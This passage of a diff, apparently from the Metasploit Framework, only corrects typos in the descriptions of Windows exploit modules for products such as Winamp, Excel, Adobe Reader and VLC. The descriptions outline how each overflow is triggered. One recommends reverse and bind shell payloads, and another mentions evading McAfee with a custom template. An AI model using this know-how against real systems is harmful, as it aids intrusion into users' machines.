        initialization under Internet Explorer.
-        While the Tom Sawyer GET Extension Factory is installed with some versions of  VMware
+        While the Tom Sawyer GET Extension Factory is installed with some versions of VMware
        Infrastructure Client, this module has been tested only with the versions installed
        with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX
        control tested is tsgetx71ex553.dll, version 5.5.3.238.
--- a/modules/exploits/windows/browser/webex_ucf_newobject.rb
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
-        ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
+        ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-
        based buffer overflow will occur when copying attacker-supplied data using the
        sprintf function.
--- a/modules/exploits/windows/browser/winamp_playlist_unc.rb
+++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'Winamp Playlist UNC Path Computer Name Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the Winamp media player.
-        This flaw is triggered when a audio file path is specified, inside a
+        This flaw is triggered when an audio file path is specified, inside a
        playlist, that consists of a UNC path with a long computer name. This
        module delivers the playlist via the browser. This module has only
        been successfully tested on Winamp 5.11 and 5.12.
--- a/modules/exploits/windows/browser/winamp_ultravox.rb
+++ b/modules/exploits/windows/browser/winamp_ultravox.rb
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack buffer overflow in Winamp 5.24. By
        sending an overly long artist tag, a remote attacker may
        be able to execute arbitrary code. This vulnerability can be
-        exploited from the browser or the winamp client itself.
+        exploited from the browser or the Winamp client itself.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/browser/windvd7_applicationtype.rb
+++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX
-        control in InterVideo WinDVD 7. By sending a overly long string
+        control in InterVideo WinDVD 7. By sending an overly long string
        to the "ApplicationType()" property, an attacker may be able to
        execute arbitrary code.
      },
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
        opt-in to ASLR. As such, this module should be reliable on all Windows
        versions.
-        The WMI Adminsitrative Tools are a standalone download & install (linked in the
+        The WMI Administrative Tools are a standalone download & install (linked in the
        references).
      },
--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
+++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'                => "X360 VideoPlayer ActiveX Control Buffer Overflow",
      'Description'         => %q{
        This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
-        X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
+        X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun
        a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
      },
      'License'             => MSF_LICENSE,
--- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb
+++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX
-        Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string
+        Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string
        to the "fvCom()" method from a yahoo.com domain, an attacker may be able
        to execute arbitrary code.
      },
--- a/modules/exploits/windows/browser/yahoomessenger_server.rb
+++ b/modules/exploits/windows/browser/yahoomessenger_server.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX
        Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.
-        By sending a overly long string to the "Server()" method, and then calling
+        By sending an overly long string to the "Server()" method, and then calling
        the "Send()" method, an attacker may be able to execute arbitrary code.
        Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp"
        yield for the best results.
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
        streams with certain MAPI attachment properties, it is possible to set a path name
        to files to be executed. When a user double clicks on such an attachment or message,
        Outlook will proceed to execute the file that is set by the path name value. These
-        files can be local files, but also file stored remotely for example on a file share.
+        files can be local files, but also files stored remotely (on a file share, for example)
-        Exploitation is limited by the fact that its is not possible for attackers to supply
+        can be used. Exploitation is limited by the fact that it is not possible for attackers
-        command line options.
+        to supply command line options.
      },
      'Author'		=> 'Yorick Koster <yorick[at]akitasecurity.nl>',
      'References'	=>
--- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb
+++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
        occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges
-        of the user running the application . This module has been tested successfully on
+        of the user running the application. This module has been tested successfully on
        ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
+++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
        NOTE: This module uses a similar DEP bypass method to that used within the
        adobe_libtiff module. This method is unlikely to work across various
-        Windows versions due a the hardcoded syscall number.
+        Windows versions due to a hardcoded syscall number.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
--- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb
+++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'Adobe Reader ToolButton Use After Free',
      'Description'    => %q{
-        This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
+        This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6
        and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
        the cEnable callback can be used to early free the object memory. Later use of the object
        allows triggering the use after free condition. This module has been tested successfully
--- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
      'Description'    => %q{
-        This module exploits a vulnerability found in Apple Quicktime. The flaw is
+        This module exploits a vulnerability found in Apple QuickTime. The flaw is
-        triggered when Quicktime fails to properly handle the data length for certain
+        triggered when QuickTime fails to properly handle the data length for certain
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
        overflow by loading a specially crafted .mov file, and allows arbitrary
        code execution under the context of the current user. Please note: Since an egghunter
--- a/modules/exploits/windows/fileformat/audiotran_pls.rb
+++ b/modules/exploits/windows/fileformat/audiotran_pls.rb
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
        An attacker must send the file to victim and the victim must open the file.
        Alternatively it may be possible to execute code remotely via an embedded
-        PLS file within a browser, when the PLS extention is registered to Audiotran.
+        PLS file within a browser, when the PLS extension is registered to Audiotran.
        This functionality has not been tested in this module.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb
+++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
        An attacker must send the file to victim and the victim must open the file.
        Alternatively, it may be possible to execute code remotely via an embedded
-        PLS file within a browser when the PLS extention is registered to Audiotran.
+        PLS file within a browser when the PLS extension is registered to Audiotran.
        This alternate vector has not been tested and cannot be exercised directly
        with this module.
      },
--- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
+++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
            This module exploits a vulnerability found in Aviosoft Digital TV Player
          Pro version 1.x.  An overflow occurs when the process copies the content of a
-          playlist file on to the stack, which may result aribitrary code execution under
+          playlist file on to the stack, which may result arbitrary code execution under
          the context of the user.
        },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit
      'Name'    => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
      'Description' => %q{
        This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
-        vulnerability exists in the parising of the UserName parameter in the NetConfig.ini
+        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini
        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP
        SP3 and Windows 7 SP1.
      },
--- a/modules/exploits/windows/fileformat/ca_cab.rb
+++ b/modules/exploits/windows/fileformat/ca_cab.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'CA Antivirus Engine CAB Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.
-          By creating a specially crafted CAB file, an an attacker may be able
+          By creating a specially crafted CAB file, an attacker may be able
          to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
+++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
        a m3u playlist with a long track name, a SEH exception record can be overwritten
        with parts of the controllable buffer. SEH execution is triggered after an
-        invalid read of an injectible address, thus allowing arbitrary code execution.
+        invalid read of an injectable address, thus allowing arbitrary code execution.
        This module works on multiple Windows platforms including: Windows XP SP3,
        Windows Vista, and Windows 7.
      },
--- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb
+++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a buffer overflow vulnerability found in Chasys Draw IES
        (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
        parsing BMP files, where the ReadFile function is used to store user provided data
-        on the  stack in a insecure way. It results in arbitrary code execution under the
+        on the stack in an insecure way. It results in arbitrary code execution under the
        context of the user viewing a specially crafted BMP file. This module has been
        tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
        SP1.
--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
          similar except an additional SpecialFolderDataBlock is included. The folder ID set
-          in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
+          in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
          the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
          DLL file.
        },
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
        1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).
        An attacker must send the file to victim and the victim must open the file.
        Alternatively it may be possible to execute code remotely via an embedded
-        DBR file within a browser, since the DBR extention is registered to DeepBurner.
+        DBR file within a browser, since the DBR extension is registered to DeepBurner.
      },
      'License'        => MSF_LICENSE,
      'Author' 	 =>
--- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
+++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
        Standard.  By supplying a long string of data in a plf file (playlist), the
        MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
-        and then copy it on the stack without any proper bounds checking, which casues a
+        and then copy it on the stack without any proper bounds checking, which causes a
-        buffer overflow, and results arbitrary code execution under the context of the user.
+        buffer overflow, and results in arbitrary code execution under the context of the user.
          This module has been designed to target common Windows systems such as:
        Windows XP SP2/SP3, Windows Vista, and Windows 7.
--- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
+++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
      'Description'    => %q{
-          This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control
+          This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control
-        (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's
+        (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's
        Documentation ApplicationXtender 5.4.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
        (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
-        function ERM_convert_to_correct_webpath handles user provided data in a insecure
+        function ERM_convert_to_correct_webpath handles user provided data in an insecure
        way. It results in arbitrary code execution under the context of the user viewing
        a specially crafted .ers file. This module has been tested successfully with ERS
        Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
        The vulnerability exists in the module ermapper_u.dll, where the function
-        rf_report_error handles user provided data in a insecure way. It results in
+        rf_report_error handles user provided data in an insecure way. It results in
        arbitrary code execution under the context of the user viewing a specially crafted
        .ers file. This module has been tested successfully with ERS Viewer 2013 (versions
        13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
--- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
+++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HTML Help Workshop 4.74
-        By creating a specially crafted hhp file, an an attacker may be able
+        By creating a specially crafted hhp file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
      'Description'    => %q{
-          This module embeds an exploit into an ucompressed map file (.h3m) for
+          This module embeds an exploit into an uncompressed map file (.h3m) for
        Heroes of Might and Magic III. Once the map is started in-game, a
-        buffer overflow occuring when loading object sprite names leads to
+        buffer overflow occurring when loading object sprite names leads to
        shellcode execution.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
+++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
      saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.
      To ensure we can perform arbitrary code execution we must we provide a valid pointer at
-      0x74 which is used as a argument for the called function at 0x675751ED as a id file
+      0x74 which is used as an argument for the called function at 0x675751ED as an id file
      extension parameter. Once the caller regains control we will reach our RETURN. The Ret
-      instruction will be used to pop the overwritten saved return address which was currupted.
+      instruction will be used to pop the overwritten saved return address which was corrupted.
      This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.
--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'IcoFX Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in version 2.1
-        of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
+        of IcoFX. The vulnerability exists while parsing .ICO files, where a specially
        crafted ICONDIR header providing an arbitrary long number of images in the file
        can be used to trigger the overflow when reading the ICONDIRENTRY structures.
      },
--- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
+++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack buffer overflow in versions v9.7
        through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
        IDEAL Migration. All versions are suspected to be vulnerable.
-        By creating a specially crafted ipj file, an an attacker may be able
+        By creating a specially crafted ipj file, an attacker may be able
        to execute arbitrary code.
        NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
--- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
+++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
        The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails
        to check the FileName argument, and passes it on to a ShellExecuteW() function,
        therefore allows any malicious attacker to execute any process that's on the
-        local system.  However, if the victim machine is connected to a remote share (
+        local system.  However, if the victim machine is connected to a remote share
-        or something similiar), then it's also possible to execute arbitrary code.
+        (or something similar), then it's also possible to execute arbitrary code.
        Please note that a custom template is required for the payload, because the
        default Metasploit template is detectable by McAfee -- any Windows binary, such
        as calc.exe or notepad.exe, should bypass McAfee fine.
--- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
+++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.
          An attacker must send the file to victim and the victim must open the file.
          Alternatively it may be possible to execute code remotely via an embedded
-          PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.
+          PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.
          This functionality has not been tested in this module.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
+++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in MJM Core Player 2011
-        When opening a malicious s3m file in this applications, a stack buffer overflow can be
+        When opening a malicious s3m file in this application, a stack buffer overflow can be
        triggered, resulting in arbitrary code execution.
        This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
      },
--- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
+++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a stack-based buffer overflow found in the handling
        of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently
-        targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer.
+        targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.
        The overflow is triggered when an unsuspecting victim opens a movie file first,
        followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also
-        be done from the console with the mplayer "-sub" option.
+        be done from the console with the MPlayer "-sub" option.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
--- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
+++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
          structure from the file to calculate a pointer offset without doing proper
          validation. Attacker supplied data is then used to calculate the location of an
          object, and in turn a virtual function call. This results in arbitrary code
-          exection.
+          execution.
          NOTE: On some versions of Office, the user will need to dismiss a warning dialog
          prior to the payload executing.
--- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
+++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.
        By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker
-        can get the control of the excution flow. This results aribrary code execution under
+        can get the control of the execution flow. This results in arbitrary code execution under
        the context of the user.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a vulnerability found in Excel of Microsoft Office 2007.
        By supplying a malformed .xlb file, an attacker can control the content (source)
        of a memcpy routine, and the number of bytes to copy, therefore causing a stack-
-        based buffer overflow.  This results aribrary code execution under the context of
+        based buffer overflow.  This results in arbitrary code execution under the context of
-        user the user.
+        the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
--- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
+++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'Microsoft Visual Basic VBP Buffer Overflow',
      'Description'    => %q{
-          This module exploits a stack oveflow in Microsoft Visual
+          This module exploits a stack overflow in Microsoft Visual
        Basic 6.0. When a specially crafted vbp file containing a long
        reference line, an attacker may be able to execute arbitrary
        code.
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
          The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
          drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
          and stored in the EAX register. The 32-bit register will run out of storage space to
-          represent the large vlaue, which ends up being 0, but it still gets pushed as a
+          represent the large value, which ends up being 0, but it still gets pushed as a
-          dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
+          dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a
          chunk anyway with size 0, and the address of this chunk is used as the destination buffer
          of a memcpy function, where the source buffer is the EXIF data (an extended image format
          supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
--- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
+++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'Orbit Downloader URL Unicode Conversion Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Orbit Downloader.
-        The vulnerability is due to Orbit converting an URL ascii string to unicode
+        The vulnerability is due to Orbit converting a URL ascii string to unicode
-        in a insecure way with MultiByteToWideChar.
+        in an insecure way with MultiByteToWideChar.
        The vulnerability is exploited with a specially crafted metalink file that
        should be opened with Orbit through the "File->Add Metalink..." option.
      },
--- a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
+++ b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'            => 'PDF Shaper Buffer Overflow',
      'Description'     => %q{
          PDF Shaper is prone to a security vulnerability when processing PDF files.
-        The vulnerability appear when we use Convert PDF to Image and use a specially
+        The vulnerability appears when we use Convert PDF to Image and use a specially
-        crafted PDF file. This module has been tested successfully on Win Xp, Win 7,
+        crafted PDF file. This module has been tested successfully on Win XP, Win 7,
        Win 8, Win 10.
      },
      'License'         => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'    => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
      'Description'  => %q{
        This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
-        occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
+        occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\".
        This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.
      },
      'License'    => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
+++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
        execution.  A patch is available at visiwave.com; the fix is done by XORing the return value as
        null if no match is found, and then it is validated before use.
-        NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
+        NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a
        victim user to 'double click' the malicious VWR file and execute code.  This module was also built
        to bypass ASLR and DEP.
      },
--- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb
+++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in the Win32AddConnection
-        function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are
+        function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are
        reportedly affected.
        This vulnerability is only present in Win32 builds of VLC.
--- a/modules/exploits/windows/fileformat/vuplayer_cue.rb
+++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb
@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'VUPlayer CUE Buffer Overflow',
      'Description'    => %q{
-          This module exploits a stack over flow in VUPlayer <= 2.49. When
+          This module exploits a stack based overflow in VUPlayer <= 2.49. When
-        the application is used to open a specially crafted cue file, an buffer is overwritten allowing
+        the application is used to open a specially crafted cue file, a buffer is overwritten allowing
        for the execution of arbitrary code.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb
+++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb
@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
        exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
-        where memmove is used with in a insecure way with user controlled data.
+        where memmove is used in an insecure way with user controlled data.
-        To exploit the vulnerability the attacker must convince the attacker to install the
+        To exploit the vulnerability the attacker must convince the victim to install the
        generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
        or generate a new skin using the crafted mcvcore.maki file. The module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
--- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
+++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
      'Description'    => %q{
          This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
-          by generating an malicious file.)
+          by generating a malicious file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
--- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
+++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
          This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
        An attacker must send the file to victim and the victim must open the file.
        Alternatively it may be possible to execute code remotely via an embedded
-        PLS file within a browser, when the PLS extention is registered to Zinf.
+        PLS file within a browser, when the PLS extension is registered to Zinf.
        This functionality has not been tested in this module.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
+++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
